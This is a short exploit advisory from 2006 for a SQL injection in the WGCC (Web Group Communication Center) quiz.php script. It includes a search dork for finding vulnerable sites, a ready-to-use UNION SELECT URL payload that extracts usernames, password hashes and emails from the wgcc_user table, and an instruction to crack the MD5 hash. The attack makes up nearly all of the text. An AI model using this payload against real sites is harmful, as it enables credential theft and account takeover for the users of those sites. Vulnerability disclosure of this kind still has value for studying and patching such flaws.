WGCC <= 0.5.6b (quiz.php) Remote SQL Injection Vulnerability
2006-10-20 00:00:00# Title : WGCC Beta <= 0.5.6 (quiz.php) Remote SQL InJection Vulnerability
# Author : ajann
# Dork : "Web Group Communication Center beta 0.5.6/0.5.5/.."
# Greetz : Tüm, Müslüman, Aleminin, Ramazan, Bayram., MUBAREK, Olsun
-->Login Before Injection
[Inject]]]
### http://[target.com]/[path]/quiz.php?action=show&qzid=[]SQL INJECTION[]
Example:
quiz.php?action=show&qzid=-1%20union%20select%200,0,0,0,username,passwort,email,0,0,0,0,0,0,0,0%20from%20wgcc_user%20where%20userid=1
++ userid=1 Change This
Crack MD5 HASH
[/Inject]]]
#ajann,Turkey
#...
#Im Not Hacker!
#
Fixes
No fixesPer poter inviare un fix è necessario essere utenti registrati.